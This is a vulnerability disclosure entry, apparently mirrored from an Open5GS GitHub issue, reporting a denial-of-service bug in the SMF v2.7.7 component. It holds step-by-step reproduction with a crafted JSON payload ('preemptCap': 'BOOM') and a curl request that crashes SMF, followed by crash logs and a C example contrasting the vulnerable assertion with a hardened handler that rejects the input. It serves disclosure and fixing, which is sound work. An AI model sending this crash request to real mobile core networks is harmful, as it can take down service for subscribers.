Submission #808472 info: Open5gs SMF v2.7.7 Denial of Service

Title: Open5gs SMF v2.7.7 Denial of Service
Description:

### Open5GS Release, Revision, or Tag

v2.7.7

### Description

SMF crashes when an `sm-policy-notify` callback carries a `SmPolicyDecision` whose referenced `qosDecs[*].arp.preemptCap` string is not one of the expected OpenAPI enum values. The OpenAPI enum decoder returns `0` for unknown strings instead of rejecting the request:

```c
OpenAPI_preemption_capability_e OpenAPI_preemption_capability_FromString(char* s)
{
    ...
    return 0;
}
```

SMF later assumes the enum was valid and asserts that `pre_emption_capability` was set:

```c
if (QosData->arp->preempt_cap == OpenAPI_preemption_capability_NOT_PREEMPT)
    pcc_rule->qos.arp.pre_emption_capability = OGS_5GC_PRE_EMPTION_DISABLED;
else if (QosData->arp->preempt_cap == OpenAPI_preemption_capability_MAY_PREEMPT)
    pcc_rule->qos.arp.pre_emption_capability = OGS_5GC_PRE_EMPTION_ENABLED;
ogs_assert(pcc_rule->qos.arp.pre_emption_capability);
```

So a semantically invalid policy update aborts the whole SMF process instead of returning a normal `400` response. This issue is distinct from the existing `missing-flowDescription` and `oversized-flowInfos` reports in `report/smf/`; it uses a different malformed field and crashes on a different assertion.

### Steps to reproduce

1. Start the Open5GS live Docker lab.
2. Bring up UERANSIM gNB and UE with the provided configs:

   ```bash
   docker run -d --rm --name smf-audit-gnb \
     --network open5gs --network-alias gnb.ueransim.org \
     -v /home/ubuntu/docker-open5gs/configs/internal/ueransim/gnb.yaml:/ueransim/config/gnb.yaml:ro \
     free5gc/ueransim:latest /ueransim/nr-gnb -c /ueransim/config/gnb.yaml

   docker run -d --rm --name smf-audit-ue \
     --network open5gs --network-alias ue.ueransim.org \
     --cap-add NET_ADMIN --privileged \
     -v /home/ubuntu/docker-open5gs/configs/internal/ueransim/ue.yaml:/ueransim/config/ue.yaml:ro \
     free5gc/ueransim:latest /ueransim/nr-ue -c /ueransim/config/ue.yaml -r
   ```

3. Wait until the UE log shows:

   ```text
   PDU Session establishment is successful PSI[1]
   ```

4. Send the forged callback to the active `smContextRef` (`1` in this run):

   ```bash
   payload=$(python3 - <<'PY'
   import json
   body = {
       "smPolicyDecision": {
           "pccRules": {
               "r1": {
                   "pccRuleId": "r1",
                   "precedence": 1,
                   "refQosData": ["q1"]
               }
           },
           "qosDecs": {
               "q1": {
                   "qosId": "q1",
                   "5qi": 1,
                   "priorityLevel": 1,
                   "arp": {
                       "priorityLevel": 1,
                       "preemptCap": "BOOM",
                       "preemptVuln": "PREEMPTABLE"
                   }
               }
           }
       }
   }
   print(json.dumps(body, separators=(",", ":")))
   PY
   )
   curl --http2-prior-knowledge -m 5 -sS -i \
     -X POST http://10.33.33.10/nsmf-callback/v1/sm-policy-notify/1/update \
     -H 'content-type: application/json' \
     --data "$payload"
   ```

5. Check SMF state and logs:

   ```bash
   docker inspect -f '{{.State.Status}} {{.State.ExitCode}} {{.State.FinishedAt}}' smf
   docker logs --since 2026-04-10T20:43:35Z smf
   ```

### Logs

```shell
curl: (92) HTTP/2 stream 1 was not closed cleanly before end of the underlying stream
exited 139 2026-04-10T20:43:42.982345789Z
04/10 20:43:42.874: [smf] FATAL: update_authorized_pcc_rule_and_qos: Assertion `pcc_rule->qos.arp.pre_emption_capability' failed. (../src/smf/npcf-handler.c:231)
```

### Expected behaviour

SMF should reject unknown `preemptCap` values with a normal HTTP error response.

### Observed Behaviour

The callback aborts the HTTP/2 stream and the SMF process exits with code `139`.

### eNodeB/gNodeB

UERANSIM gNB v3.2.7

### UE Models and versions

UERANSIM gNB v3.2.7
Source: https://github.com/open5gs/open5gs/issues/4442
User: LinZiyu (UID 94035)
Submitted: 2026-04-20 20:57 (2 months ago)
Moderated: 2026-05-10 16:40 (20 days later)
Status: Accepted
VulDB entry: 362545 [Open5GS up to 2.7.7 SMF /src/smf/npcf-handler.c update_authorized_pcc_rule_and_qos denial of service]
Points: 20
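The decoder-and-assert pattern the report describes, shown as an added example that is not Open5GS code: a lenient FromString-style decoder that maps an unknown string to `0`, a handler shaped like the quoted `update_authorized_pcc_rule_and_qos` mapping that then trips over the unset value, and a hardened variant that validates the enum at the input boundary and answers `400` instead. The enum and constant names are the ones the report quotes; their numeric values, the `strict_preempt_cap_from_string` helper, the two `*_map_preempt_cap` functions and the `HTTP_*`/`WOULD_ABORT` return codes are assumptions of this example (the real SMF calls `ogs_assert()`, which aborts the process rather than returning).

```c
#include <stdio.h>
#include <string.h>

/*
 * Stand-ins for the generated OpenAPI enum and the SMF-side ARP constants
 * named in the report. Names follow the report; values are assumptions.
 */
typedef enum {
    OpenAPI_preemption_capability_NULL = 0,
    OpenAPI_preemption_capability_NOT_PREEMPT,
    OpenAPI_preemption_capability_MAY_PREEMPT
} OpenAPI_preemption_capability_e;

#define OGS_5GC_PRE_EMPTION_DISABLED 1
#define OGS_5GC_PRE_EMPTION_ENABLED  2

/* Hypothetical outcome codes so the two handlers can be compared side by side. */
#define HTTP_OK          200
#define HTTP_BAD_REQUEST 400
#define WOULD_ABORT       -1   /* the point where the real handler hits ogs_assert() */

/* Lenient decoder: the generated pattern the report quotes, unknown string -> 0. */
OpenAPI_preemption_capability_e lenient_preempt_cap_from_string(const char *s)
{
    if (s && strcmp(s, "NOT_PREEMPT") == 0)
        return OpenAPI_preemption_capability_NOT_PREEMPT;
    if (s && strcmp(s, "MAY_PREEMPT") == 0)
        return OpenAPI_preemption_capability_MAY_PREEMPT;
    return 0;                            /* "BOOM" (and NULL) land here */
}

/* Strict decoder: tells a recognised value apart from an unknown one. Returns 1 on success. */
int strict_preempt_cap_from_string(const char *s, OpenAPI_preemption_capability_e *out)
{
    *out = lenient_preempt_cap_from_string(s);
    return *out != OpenAPI_preemption_capability_NULL;
}

/*
 * Handler shaped like the quoted mapping: decode, map the two known values,
 * then assert the result was set. Returns WOULD_ABORT where ogs_assert() would
 * abort, so the failure is observable instead of killing the process.
 */
int vulnerable_map_preempt_cap(const char *json_value, int *pre_emption_capability)
{
    OpenAPI_preemption_capability_e preempt_cap =
        lenient_preempt_cap_from_string(json_value);

    *pre_emption_capability = 0;
    if (preempt_cap == OpenAPI_preemption_capability_NOT_PREEMPT)
        *pre_emption_capability = OGS_5GC_PRE_EMPTION_DISABLED;
    else if (preempt_cap == OpenAPI_preemption_capability_MAY_PREEMPT)
        *pre_emption_capability = OGS_5GC_PRE_EMPTION_ENABLED;

    if (!*pre_emption_capability)        /* ogs_assert(pcc_rule->qos.arp.pre_emption_capability) */
        return WOULD_ABORT;
    return HTTP_OK;
}

/*
 * Hardened handler: reject the request at the input boundary. An unknown enum
 * string from the peer is a 400, not a condition an assert should guard.
 */
int hardened_map_preempt_cap(const char *json_value, int *pre_emption_capability)
{
    OpenAPI_preemption_capability_e preempt_cap;

    *pre_emption_capability = 0;
    if (!strict_preempt_cap_from_string(json_value, &preempt_cap)) {
        fprintf(stderr, "rejecting unknown preemptCap [%s]\n",
                json_value ? json_value : "(null)");
        return HTTP_BAD_REQUEST;
    }
    *pre_emption_capability =
        (preempt_cap == OpenAPI_preemption_capability_NOT_PREEMPT)
            ? OGS_5GC_PRE_EMPTION_DISABLED : OGS_5GC_PRE_EMPTION_ENABLED;
    return HTTP_OK;
}

int main(void)
{
    /* Constructed inputs: the two legitimate enum strings and the "BOOM" from the report. */
    const char *inputs[] = { "NOT_PREEMPT", "MAY_PREEMPT", "BOOM" };
    for (size_t i = 0; i < sizeof inputs / sizeof inputs[0]; i++) {
        int v = 0, h = 0;
        int rv = vulnerable_map_preempt_cap(inputs[i], &v);
        int rh = hardened_map_preempt_cap(inputs[i], &h);
        printf("%-12s vulnerable=%4d (cap=%d)  hardened=%4d (cap=%d)\n",
               inputs[i], rv, v, rh, h);
    }
    return 0;
}
```

The fix is purely about where validation happens: decoding a peer-supplied enum is input handling, so its failure must surface as a response code, while `ogs_assert()` is only appropriate for invariants the local code controls.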
